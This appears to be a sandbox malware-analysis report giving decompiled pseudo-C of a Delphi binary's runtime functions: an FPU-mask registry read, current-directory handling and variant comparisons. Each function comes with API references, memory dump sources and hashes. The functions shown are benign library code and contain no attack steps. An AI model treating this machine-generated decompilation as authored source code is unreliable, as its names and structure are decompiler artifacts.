				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x49b024; // 0x1372
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x49b024 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00403ACD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403ad4);
					return RegCloseKey(_v8);
				}
			}












                                                                                                                                                                                          0x00403a5d
                                                                                                                                                                                          0x00403a5f
                                                                                                                                                                                          0x00403a69
                                                                                                                                                                                          0x00403a85
                                                                                                                                                                                          0x00403ad4
                                                                                                                                                                                          0x00403ae6
                                                                                                                                                                                          0x00403ae9
                                                                                                                                                                                          0x00403af2
                                                                                                                                                                                          0x00403a87
                                                                                                                                                                                          0x00403a89
                                                                                                                                                                                          0x00403a8a
                                                                                                                                                                                          0x00403a8f
                                                                                                                                                                                          0x00403a92
                                                                                                                                                                                          0x00403a95
                                                                                                                                                                                          0x00403ab1
                                                                                                                                                                                          0x00403ab8
                                                                                                                                                                                          0x00403abb
                                                                                                                                                                                          0x00403abe
                                                                                                                                                                                          0x00403acc
                                                                                                                                                                                          0x00403acc

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403A7E
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AB1
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00403AD4,00000000,?,00000004,00000000,00403ACD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403AC7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                                          • Opcode ID: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                          • Instruction ID: 51662933c9f6040cf9cf53aa0deae1acaa2dd39dd85ca193a1d107641bf38472
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0b281ac80290ee6c711265bf9d2c1ca1230f468a622cdfabddc8fc273f199101
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0801B575A10208BAEB11DFD1DD02BBEB7ACEB08B01F100077BA14F25D0E6786A10CB5C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402944 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402944(void* __eax, void* __edx) {
				char _v271;
				char _v532;
				char _v534;
				char _v535;
				void* _t21;
				void* _t25;
				CHAR* _t26;

				_t25 = __edx;
				_t21 = __eax;
				if(__eax != 0) {
					 *_t26 = 0x40;
					_v535 = 0x3a;
					_v534 = 0;
					GetCurrentDirectoryA(0x105,  &_v271);
					SetCurrentDirectoryA(_t26);
				}
				GetCurrentDirectoryA(0x105,  &_v532);
				if(_t21 != 0) {
					SetCurrentDirectoryA( &_v271);
				}
				return E00404C30(_t25, 0x105,  &_v532);
			}










                                                                                                                                                                                          0x0040294c
                                                                                                                                                                                          0x0040294e
                                                                                                                                                                                          0x00402952
                                                                                                                                                                                          0x0040295c
                                                                                                                                                                                          0x0040295f
                                                                                                                                                                                          0x00402964
                                                                                                                                                                                          0x00402976
                                                                                                                                                                                          0x0040297c
                                                                                                                                                                                          0x0040297c
                                                                                                                                                                                          0x0040298b
                                                                                                                                                                                          0x00402992
                                                                                                                                                                                          0x0040299c
                                                                                                                                                                                          0x0040299c
                                                                                                                                                                                          0x004029b9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 00402976
                                                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 0040297C
                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000105,?), ref: 0040298B
                                                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(?,00000105,?), ref: 0040299C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                          • API String ID: 1611563598-336475711
                                                                                                                                                                                          • Opcode ID: 477ba3aecbe74f0e0459d0c309aee00efd5eec9b23586f52c00e670455a24c92
                                                                                                                                                                                          • Instruction ID: c5c7b0dff09aeac35822bcb6cbe030b0537c54a7cf5c2cde62247dac08ae10a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 477ba3aecbe74f0e0459d0c309aee00efd5eec9b23586f52c00e670455a24c92
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF096662497C01EE310E6698856BDB72DC8B55304F04442EBACCD73C2E6B8894457A7
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004166D4 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 67%
                                                                                                                                                                                          			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				void* _v24;
				void* _v28;
				signed int _v44;
				void* __ebx;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							if(E0041713C(_t338,  &_v24) != 0) {
								_push( &_v18);
								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E0041713C(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E0041024C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													goto L46;
												} else {
													_push( &_v44);
													L0040F318();
													_push(_t346);
													_push(0x416ab5);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0041015C(_t256, _t268);
													}
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(0x416ae8);
													return E004109E8( &_v44);
												}
											}
										} else {
											E0041024C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4169ff);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0041015C(_t256, _t273);
										}
										_v13 = E00416548( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x41695d);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0041015C(_t256, _t278);
										}
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00416314(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E0041713C( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L0040F318();
									_push(_t346);
									_push(0x41686d);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0041015C(_t256, _t284);
									}
									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(0x416ae8);
									return E004109E8( &_v44);
								} else {
									if( *_t256 == _v16) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4167df);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0041015C(_t256, _t289);
										}
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00416314(1, 0);
						L46:
						return _v13;
					}
				}
			}
























                                                                                                                                                                                          0x004166d4
                                                                                                                                                                                          0x004166d5
                                                                                                                                                                                          0x004166d7
                                                                                                                                                                                          0x004166dc
                                                                                                                                                                                          0x004166df
                                                                                                                                                                                          0x004166e2
                                                                                                                                                                                          0x004166e4
                                                                                                                                                                                          0x004166e8
                                                                                                                                                                                          0x004166f5
                                                                                                                                                                                          0x00416877
                                                                                                                                                                                          0x0041687d
                                                                                                                                                                                          0x00416897
                                                                                                                                                                                          0x004168b9
                                                                                                                                                                                          0x004168c8
                                                                                                                                                                                          0x004168db
                                                                                                                                                                                          0x00416991
                                                                                                                                                                                          0x0041699e
                                                                                                                                                                                          0x00416a15
                                                                                                                                                                                          0x00416a24
                                                                                                                                                                                          0x00416a36
                                                                                                                                                                                          0x00416ae3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416a3c
                                                                                                                                                                                          0x00416a43
                                                                                                                                                                                          0x00416ade
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416a45
                                                                                                                                                                                          0x00416a48
                                                                                                                                                                                          0x00416a49
                                                                                                                                                                                          0x00416a50
                                                                                                                                                                                          0x00416a51
                                                                                                                                                                                          0x00416a56
                                                                                                                                                                                          0x00416a59
                                                                                                                                                                                          0x00416a5c
                                                                                                                                                                                          0x00416a65
                                                                                                                                                                                          0x00416a72
                                                                                                                                                                                          0x00416a74
                                                                                                                                                                                          0x00416a74
                                                                                                                                                                                          0x00416a9c
                                                                                                                                                                                          0x00416aa1
                                                                                                                                                                                          0x00416aa4
                                                                                                                                                                                          0x00416aa7
                                                                                                                                                                                          0x00416ab4
                                                                                                                                                                                          0x00416ab4
                                                                                                                                                                                          0x00416a43
                                                                                                                                                                                          0x00416a17
                                                                                                                                                                                          0x00416a17
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416a17
                                                                                                                                                                                          0x004169a0
                                                                                                                                                                                          0x004169a3
                                                                                                                                                                                          0x004169a4
                                                                                                                                                                                          0x004169ab
                                                                                                                                                                                          0x004169ac
                                                                                                                                                                                          0x004169b1
                                                                                                                                                                                          0x004169b4
                                                                                                                                                                                          0x004169ba
                                                                                                                                                                                          0x004169c2
                                                                                                                                                                                          0x004169d1
                                                                                                                                                                                          0x004169d3
                                                                                                                                                                                          0x004169d3
                                                                                                                                                                                          0x004169e6
                                                                                                                                                                                          0x004169eb
                                                                                                                                                                                          0x004169ee
                                                                                                                                                                                          0x004169f1
                                                                                                                                                                                          0x004169fe
                                                                                                                                                                                          0x004169fe
                                                                                                                                                                                          0x004168e1
                                                                                                                                                                                          0x004168eb
                                                                                                                                                                                          0x00416986
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004168ed
                                                                                                                                                                                          0x004168f0
                                                                                                                                                                                          0x004168f1
                                                                                                                                                                                          0x004168f8
                                                                                                                                                                                          0x004168f9
                                                                                                                                                                                          0x004168fe
                                                                                                                                                                                          0x00416901
                                                                                                                                                                                          0x00416904
                                                                                                                                                                                          0x0041690e
                                                                                                                                                                                          0x0041691b
                                                                                                                                                                                          0x0041691d
                                                                                                                                                                                          0x0041691d
                                                                                                                                                                                          0x00416944
                                                                                                                                                                                          0x00416949
                                                                                                                                                                                          0x0041694c
                                                                                                                                                                                          0x0041694f
                                                                                                                                                                                          0x0041695c
                                                                                                                                                                                          0x0041695c
                                                                                                                                                                                          0x004168eb
                                                                                                                                                                                          0x004168bb
                                                                                                                                                                                          0x004168bb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004168bb
                                                                                                                                                                                          0x00416899
                                                                                                                                                                                          0x004168a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004168a5
                                                                                                                                                                                          0x0041687f
                                                                                                                                                                                          0x00416888
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416888
                                                                                                                                                                                          0x004166fb
                                                                                                                                                                                          0x004166fe
                                                                                                                                                                                          0x00416715
                                                                                                                                                                                          0x0041673b
                                                                                                                                                                                          0x0041674a
                                                                                                                                                                                          0x0041675c
                                                                                                                                                                                          0x00416813
                                                                                                                                                                                          0x00416814
                                                                                                                                                                                          0x0041681b
                                                                                                                                                                                          0x0041681c
                                                                                                                                                                                          0x00416821
                                                                                                                                                                                          0x00416824
                                                                                                                                                                                          0x00416827
                                                                                                                                                                                          0x00416830
                                                                                                                                                                                          0x00416840
                                                                                                                                                                                          0x00416842
                                                                                                                                                                                          0x00416842
                                                                                                                                                                                          0x00416854
                                                                                                                                                                                          0x00416859
                                                                                                                                                                                          0x0041685c
                                                                                                                                                                                          0x0041685f
                                                                                                                                                                                          0x0041686c
                                                                                                                                                                                          0x00416762
                                                                                                                                                                                          0x00416769
                                                                                                                                                                                          0x00416808
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041676b
                                                                                                                                                                                          0x0041676e
                                                                                                                                                                                          0x0041676f
                                                                                                                                                                                          0x00416776
                                                                                                                                                                                          0x00416777
                                                                                                                                                                                          0x0041677c
                                                                                                                                                                                          0x0041677f
                                                                                                                                                                                          0x00416782
                                                                                                                                                                                          0x0041678b
                                                                                                                                                                                          0x0041679c
                                                                                                                                                                                          0x0041679e
                                                                                                                                                                                          0x0041679e
                                                                                                                                                                                          0x004167c6
                                                                                                                                                                                          0x004167cb
                                                                                                                                                                                          0x004167ce
                                                                                                                                                                                          0x004167d1
                                                                                                                                                                                          0x004167de
                                                                                                                                                                                          0x004167de
                                                                                                                                                                                          0x00416769
                                                                                                                                                                                          0x0041673d
                                                                                                                                                                                          0x0041673d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041673d
                                                                                                                                                                                          0x00416717
                                                                                                                                                                                          0x00416723
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00416723
                                                                                                                                                                                          0x00416700
                                                                                                                                                                                          0x00416709
                                                                                                                                                                                          0x00416ae8
                                                                                                                                                                                          0x00416af0
                                                                                                                                                                                          0x00416af0
                                                                                                                                                                                          0x004166fe

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f0b6de8c0b7f4084087737e0627dcd53f14a7a4ad3537484deec7db3a969bcbe
                                                                                                                                                                                          • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0b6de8c0b7f4084087737e0627dcd53f14a7a4ad3537484deec7db3a969bcbe
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00415454 Relevance: 7.8, APIs: 5, Instructions: 271COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				signed int _v18;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v44;
				void* __ebx;
				void* __ebp;
				void* _t119;
				signed int _t207;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr _t250;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t264;
				intOrPtr _t268;
				void* _t271;
				void* _t273;
				intOrPtr _t274;

				_t278 = __fp0;
				_t269 = __edi;
				_t271 = _t273;
				_t274 = _t273 + 0xffffffd8;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t204 =  *_v8;
				if(( *_v8 & 0x00000fff) >= 0x10f) {
					if(E0041713C(_t204,  &_v24) == 0) {
						E0041024C(__ecx);
					}
					_push( &_v20);
					_t216 = _v16;
					_t205 =  *_v24;
					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
						_t207 =  *_v12;
						if((_t207 & 0x00000fff) >= 0x10f) {
							if(E0041713C(_t207,  &_v28) != 0) {
								_push( &_v18);
								_t217 = _v16;
								_t208 =  *_v28;
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_t119 = E0041024C(_t217);
									goto L40;
								} else {
									if( *_v8 == _v18) {
										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
										goto L40;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t271);
										_push(0x415779);
										_push( *[fs:eax]);
										 *[fs:eax] = _t274;
										_t219 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
										E00410E14(_v8,  &_v44);
										if( *_v8 != _v18) {
											E0041015C(_t208, _t219);
										}
										_pop(_t250);
										 *[fs:eax] = _t250;
										_push(0x415780);
										return E004109E8( &_v44);
									}
								}
							} else {
								_t119 = E0041024C(_t216);
								goto L40;
							}
						} else {
							if(_t207 ==  *_v8) {
								_t119 = E004161B0(_v8, _v16, _v12, _t278);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x4156ca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t224 =  *_v12 & 0x0000ffff;
								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
								E00410E14(_v8,  &_v44);
								if( *_v8 !=  *_v12) {
									E0041015C(_t207, _t224);
								}
								_pop(_t255);
								 *[fs:eax] = _t255;
								_push(0x4156d1);
								return E004109E8( &_v44);
							}
						}
					} else {
						if( *_v12 == _v20) {
							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							goto L40;
						} else {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41562f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t228 = _v20 & 0x0000ffff;
							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
							if(_v44 != _v20) {
								E0041015C(_t205, _t228);
							}
							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							_pop(_t259);
							 *[fs:eax] = _t259;
							_push(0x415799);
							return E004109E8( &_v44);
						}
					}
				} else {
					if(E0041713C( *_v12,  &_v28) != 0) {
						_push( &_v18);
						_t213 =  *_v28;
						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41558f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t234 =  *_v8 & 0x0000ffff;
							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
							if( *_v8 != _v44) {
								E0041015C(_t213, _t234);
							}
							E004161B0(_v8, _v16,  &_v44, _t278);
							_pop(_t264);
							 *[fs:eax] = _t264;
							_push(0x415799);
							return E004109E8( &_v44);
						} else {
							if( *_v8 == _v18) {
								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x415514);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t239 = _v18 & 0x0000ffff;
								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
								E00410E14(_v8,  &_v44);
								if( *_v8 != _v18) {
									E0041015C(_t213, _t239);
								}
								_pop(_t268);
								 *[fs:eax] = _t268;
								_push(0x41551b);
								return E004109E8( &_v44);
							}
						}
					} else {
						_t119 = E0041024C(__ecx);
						L40:
						return _t119;
					}
				}
			}

























                                                                                                                                                                                          0x00415454
                                                                                                                                                                                          0x00415454
                                                                                                                                                                                          0x00415455
                                                                                                                                                                                          0x00415457
                                                                                                                                                                                          0x0041545b
                                                                                                                                                                                          0x0041545e
                                                                                                                                                                                          0x00415461
                                                                                                                                                                                          0x00415467
                                                                                                                                                                                          0x00415474
                                                                                                                                                                                          0x004155a5
                                                                                                                                                                                          0x004155a7
                                                                                                                                                                                          0x004155a7
                                                                                                                                                                                          0x004155af
                                                                                                                                                                                          0x004155b3
                                                                                                                                                                                          0x004155b9
                                                                                                                                                                                          0x004155c0
                                                                                                                                                                                          0x00415650
                                                                                                                                                                                          0x0041565d
                                                                                                                                                                                          0x004156f3
                                                                                                                                                                                          0x00415702
                                                                                                                                                                                          0x00415706
                                                                                                                                                                                          0x0041570c
                                                                                                                                                                                          0x00415713
                                                                                                                                                                                          0x00415794
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00415715
                                                                                                                                                                                          0x0041571f
                                                                                                                                                                                          0x0041578f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00415721
                                                                                                                                                                                          0x00415724
                                                                                                                                                                                          0x00415725
                                                                                                                                                                                          0x0041572c
                                                                                                                                                                                          0x0041572d
                                                                                                                                                                                          0x00415732
                                                                                                                                                                                          0x00415735
                                                                                                                                                                                          0x00415738
                                                                                                                                                                                          0x00415742
                                                                                                                                                                                          0x0041574d
                                                                                                                                                                                          0x0041575c
                                                                                                                                                                                          0x0041575e
                                                                                                                                                                                          0x0041575e
                                                                                                                                                                                          0x00415765
                                                                                                                                                                                          0x00415768
                                                                                                                                                                                          0x0041576b
                                                                                                                                                                                          0x00415778
                                                                                                                                                                                          0x00415778
                                                                                                                                                                                          0x0041571f
                                                                                                                                                                                          0x004156f5
                                                                                                                                                                                          0x004156f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004156f5
                                                                                                                                                                                          0x00415663
                                                                                                                                                                                          0x0041566c
                                                                                                                                                                                          0x004156da
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041566e
                                                                                                                                                                                          0x00415671
                                                                                                                                                                                          0x00415672
                                                                                                                                                                                          0x00415679
                                                                                                                                                                                          0x0041567a
                                                                                                                                                                                          0x0041567f
                                                                                                                                                                                          0x00415682
                                                                                                                                                                                          0x00415688
                                                                                                                                                                                          0x00415691
                                                                                                                                                                                          0x0041569c
                                                                                                                                                                                          0x004156ad
                                                                                                                                                                                          0x004156af
                                                                                                                                                                                          0x004156af
                                                                                                                                                                                          0x004156b6
                                                                                                                                                                                          0x004156b9
                                                                                                                                                                                          0x004156bc
                                                                                                                                                                                          0x004156c9
                                                                                                                                                                                          0x004156c9
                                                                                                                                                                                          0x0041566c
                                                                                                                                                                                          0x004155c6
                                                                                                                                                                                          0x004155d0
                                                                                                                                                                                          0x00415645
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004155d2
                                                                                                                                                                                          0x004155d5
                                                                                                                                                                                          0x004155d6
                                                                                                                                                                                          0x004155dd
                                                                                                                                                                                          0x004155de
                                                                                                                                                                                          0x004155e3
                                                                                                                                                                                          0x004155e6
                                                                                                                                                                                          0x004155e9
                                                                                                                                                                                          0x004155f3
                                                                                                                                                                                          0x00415600
                                                                                                                                                                                          0x00415602
                                                                                                                                                                                          0x00415602
                                                                                                                                                                                          0x00415616
                                                                                                                                                                                          0x0041561b
                                                                                                                                                                                          0x0041561e
                                                                                                                                                                                          0x00415621
                                                                                                                                                                                          0x0041562e
                                                                                                                                                                                          0x0041562e
                                                                                                                                                                                          0x004155d0
                                                                                                                                                                                          0x0041547a
                                                                                                                                                                                          0x0041548a
                                                                                                                                                                                          0x00415499
                                                                                                                                                                                          0x004154a3
                                                                                                                                                                                          0x004154aa
                                                                                                                                                                                          0x00415535
                                                                                                                                                                                          0x00415536
                                                                                                                                                                                          0x0041553d
                                                                                                                                                                                          0x0041553e
                                                                                                                                                                                          0x00415543
                                                                                                                                                                                          0x00415546
                                                                                                                                                                                          0x0041554c
                                                                                                                                                                                          0x00415555
                                                                                                                                                                                          0x00415564
                                                                                                                                                                                          0x00415566
                                                                                                                                                                                          0x00415566
